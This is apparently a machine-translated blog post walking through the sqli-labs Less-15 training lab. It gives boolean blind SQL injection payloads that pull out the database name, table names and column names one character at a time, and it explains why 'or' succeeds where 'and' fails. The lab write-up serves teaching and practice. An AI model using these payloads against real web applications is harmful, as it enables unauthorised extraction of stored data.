当前位置:网站首页>About sqli lab less-15 using or instead of and parsing
About sqli lab less-15 using or instead of and parsing
2022-07-07 12:23:00 【hcjtn】
Follow the old train of thought , Try the means of reporting errors , It is found that no error statement is output , View source code , It is found that there is no output statement ( So consider using blind injection )
( With 15 For example )
Determine the database length :’or (length(database()))=8-- q
Judge the database name :'or (ascii(substr(database(),1,1)))=115-- q
The name of the judgment table :'or (ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1)))=101-- q
Determine the name of the column :'or (ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1)))=105-- q
We found that in the previous eight and nine levels, we used and; And by the 15 Turn off , We use or , Let's look at the following two levels of source code ( Take questions 9 and 15 as examples )
Now let's put these two statements together :
It's not hard to see. , If we were 15 Question use and Then it will become :
Obviously not , Because we don't know username Value . If you use or, Then the following values are established as a whole .
And in the 9 In question id=1 Is established, so it can be used and As a connection of statements .
边栏推荐
- [shortest circuit] acwing 1127 Sweet butter (heap optimized dijsktra or SPFA)
- Tutorial on principles and applications of database system (009) -- conceptual model and data model
- 全球首堆“玲龙一号”反应堆厂房钢制安全壳上部筒体吊装成功
- TypeScript 接口继承
- 关于 Web Content-Security-Policy Directive 通过 meta 元素指定的一些测试用例
- (to be deleted later) yyds, paid academic resources, please keep a low profile!
- C#中在路径前加@的作用
- Tutorial on the principle and application of database system (008) -- exercises on database related concepts
- Introduction to three methods of anti red domain name generation
- 牛客网刷题网址
猜你喜欢
Mise en œuvre du codage Huffman et du décodage avec interface graphique par MATLAB
Detailed explanation of debezium architecture of debezium synchronization
powershell cs-UTF-16LE编码上线
Sort out the garbage collection of JVM, and don't involve high-quality things such as performance tuning for the time being
Mastering the new functions of swiftui 4 weatherkit and swift charts
Swiftui tutorial how to realize automatic scrolling function in 2 seconds
Epp+dis learning road (2) -- blink! twinkle!
HCIA复习整理
The road to success in R & D efficiency of 1000 person Internet companies
30. Feed shot named entity recognition with self describing networks reading notes
随机推荐
Processing strategy of message queue message loss and repeated message sending
数据库系统原理与应用教程(007)—— 数据库相关概念
Is it safe to open an account in Ping An Securities mobile bank?
Idea 2021 Chinese garbled code
Introduction and application of smoothstep in unity: optimization of dissolution effect
TypeScript 接口继承
Flet tutorial 17 basic introduction to card components (tutorial includes source code)
Swiftui tutorial how to realize automatic scrolling function in 2 seconds
从工具升级为解决方案,有赞的新站位指向新价值
30. Feed shot named entity recognition with self describing networks reading notes
The hoisting of the upper cylinder of the steel containment of the world's first reactor "linglong-1" reactor building was successful
Tutorial on principles and applications of database system (009) -- conceptual model and data model
C#中在路径前加@的作用
[filter tracking] comparison between EKF and UKF based on MATLAB extended Kalman filter [including Matlab source code 1933]
Visual studio 2019 (localdb) \mssqllocaldb SQL Server 2014 database version is 852 and cannot be opened. This server supports version 782 and earlier
An error occurred when vscade tried to create a file in the target directory: access denied [resolved]
Solve server returns invalid timezone Go to ‘Advanced’ tab and set ‘serverTimezone’ property manually
Superscalar processor design yaoyongbin Chapter 10 instruction submission excerpt
(待会删)yyds,付费搞来的学术资源,请低调使用!
Detailed explanation of debezium architecture of debezium synchronization